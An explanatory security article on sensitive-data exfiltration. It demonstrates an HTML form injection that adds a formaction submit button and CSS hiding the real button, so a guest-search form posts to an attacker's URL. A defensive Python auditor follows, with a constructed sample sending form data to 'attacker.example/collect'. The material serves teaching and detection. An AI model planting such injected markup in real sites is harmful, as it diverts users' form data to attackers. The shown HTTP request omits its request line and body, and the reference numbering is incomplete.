Sensitive Data-Exfiltration


The topic of this article is the leakage of sensitive information from a protected network to an external one, caused by intruders exploiting vulnerabilities in the hardware/software system. Sensitive information may be contained in:

  • static files: images, texts, spreadsheets, phone books, agendas, etc.;
  • multimedia sessions: telephone conversations, video conferences, chat channels (text, video, images).

The leakage can be done in several ways:

- the data are exfiltrated without altering the original files;
- the data are modified: converted to a new file format or encrypted;
- the data are hidden using steganography techniques;
- the data are exfiltrated using a combination of the aforementioned techniques.

“Data exfiltration is the unauthorized transfer of sensitive information from a target’s network to a location which a threat actor controls”. [02]
Considering data exfiltration at several levels and analysing the related risks, we have the following threats:

National Security: the theft of classified documents may endanger national security;
Organizations: proprietary information can be sold to a rival company, causing a loss of competitive advantage;
Citizens: the spreading of personal sensitive data can have serious privacy and security implications, such as identity theft.

For National Security and Organizations the worst scenario is when the attackers not only steal data but also modify them, turning cyber-espionage into cyber-sabotage.



An attacker can export users’ sensitive data using an “HTML form injection attack”. Here is an example that uses the formaction attribute. According to the HTML5 specification, formaction on a submit button overrides the action attribute of its parent form.

Let us consider the following normal form in an HTML page:


<form action="URL" ... >

    list of couples (label, data-box)

    <button type="submit" ... > label </button>

</form>



We inject a formaction attribute:

<form action="URL" ... >

    list of couples (label, data-box)

    <button type="submit" formaction="BAD URL"> Fake Search! </button>

</form>


The injected button submits the form data to BAD URL instead of URL.



The following HTML:



<form name="fsbycode" class="s4form" action="" method="post">

    <h2>Search Guest By Numeric Code</h2>

    Codice Numerico: <input type="number" autocomplete="on" id="icode" name="icode" autofocus placeholder="Insert Code Number" >

    <input class="SButton" type="submit" value="Search!">

</form>




produces this form in the web browser:

[Image: Normal Web Form]

On the other hand, here is the abused HTML:

<form name="fsbycode" class="s4form" action="" method="post">

    <h2>Search Guest By Numeric Code</h2>

    Codice Numerico: <input type="number" autocomplete="on" id="icode" name="icode"
    autofocus placeholder="Insert Code Number" >

    <!-- BEGIN attacker's code -->
    <button type="submit" formaction=""> Fake Search! </button>
    <style> .SButton {visibility:hidden;} </style>
    <!-- END attacker's code -->

    <input class="SButton" type="submit" value="Search!">

</form>



It is important to point out that the formaction attribute is supported in Internet Explorer 10, Firefox, Opera, Chrome and Safari, so the injected button works in all mainstream browsers.

The previous HTML shows in the browser:

[Image: Abused Web Form]

By clicking on the Fake Search! button, the following HTTP request is produced:

Proxy-Connection: keep-alive
Content-Length: 16
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: null
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip,deflate,sdch
Accept-Language: it-IT,it;q=0.8,en-US;q=0.6,en;q=0.4,he;q=0.2


This shows how the form data are sent to the attacker's BAD URL instead of the legitimate URL.



In order to face this serious problem, the security system of an ICT infrastructure must be equipped with mechanisms for prevention, detection, damage limitation and monitoring.

The goal of prevention is to lower the risk of attacks.
Blocking unauthorized communication channels is one mechanism to prevent compromised applications from exfiltrating data outside the organization.

We need a system that detects when a web site is compromised, so that we can react promptly to the attack.
The use of Sensitive Information Dissemination Detection (SIDD) systems is a mechanism for stopping the leakage of sensitive information in time: a SIDD monitors the outbound traffic of the protected network and takes action in response to suspicious packets.
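As an added example (not code from the original article), a small Python audit that a site owner could run over the HTML its server actually delivers, to catch the two signs of the injected form shown above: a submit control whose formaction points to a different origin than its parent form, and a <style> inside the form that hides the legitimate submit button. The hotel.example / attacker.example hosts and the audit() function are assumptions constructed for the demo.

```python
"""Audit served HTML for the injection pattern above: off-origin formaction plus a <style> hiding the real submit button."""
from html.parser import HTMLParser
from urllib.parse import urlparse


class FormActionAuditor(HTMLParser):
    def __init__(self, page_origin):
        super().__init__()
        self.page_origin = page_origin  # scheme://host the audited page is served from
        self.findings = []
        self._form_action = None        # action of the <form> we are inside, if any
        self._in_style = False

    def _origin(self, url):
        p = urlparse(url or "")         # relative or empty URLs submit to the page's own origin
        return f"{p.scheme}://{p.netloc}" if p.netloc else self.page_origin

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._form_action = a.get("action") or ""
        elif tag == "style":
            self._in_style = True
        elif tag in ("button", "input") and "formaction" in a and self._form_action is not None:
            target = self._origin(a["formaction"])  # formaction overrides the parent form's action
            if target != self._origin(self._form_action):
                self.findings.append(f"formaction override to {target}")

    def handle_endtag(self, tag):
        if tag == "form":
            self._form_action = None
        elif tag == "style":
            self._in_style = False

    def handle_data(self, data):
        if self._in_style and self._form_action is not None:
            for rule in data.split("}"):  # crude CSS split, enough for injected one-liners
                if "{" in rule:
                    selector, body = rule.split("{", 1)
                    if "visibility:hidden" in body.replace(" ", "").lower() or "display:none" in body.replace(" ", "").lower():
                        self.findings.append(f"<style> inside form hides '{selector.strip()}'")


def audit(html, page_origin="https://hotel.example"):
    parser = FormActionAuditor(page_origin)  # returns [] when no injection pattern is seen
    parser.feed(html)
    return parser.findings


# Constructed samples: the article's search form, then the abused variant with a placeholder attacker URL.
NORMAL = '<form name="fsbycode" action="" method="post"><input type="number" name="icode"><input class="SButton" type="submit" value="Search!"></form>'
ABUSED = NORMAL.replace('<input class="SButton"', '<button type="submit" formaction="https://attacker.example/collect">'
                        'Fake Search!</button><style> .SButton {visibility:hidden;} </style><input class="SButton"')
```

Running audit(NORMAL) yields no findings, while audit(ABUSED) reports both the off-origin formaction and the hidden .SButton selector.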

When the attack is in progress we have to limit the damage.
After the attack has been detected, this is what must be done:

1) minimize the information leakage;
2) analyze which vulnerability has been exploited and whether it is structural to the system or not;
3) harden the security of the information system to avoid another attack of the same type.

Even if the security system does not detect any problem, it is still highly recommended to run periodic, randomly scheduled deep security checks, because an information leakage could have happened without anyone being aware of it.



  1. Eric Y. Chen, Sergey Gorbaty, Astha Singhal and Collin Jackson, "Self-Exfiltration: The Dangers of Browser-Enforced Information Flow Control", Carnegie Mellon University.
  3. Yali Liu, Cherita Corbett, Ken Chiang, Rennie Archibald, Biswanath Mukherjee and Dipak Ghosal, "SIDD: A Framework for Detecting Sensitive Data Exfiltration by Insider Attack", University of California, USA.

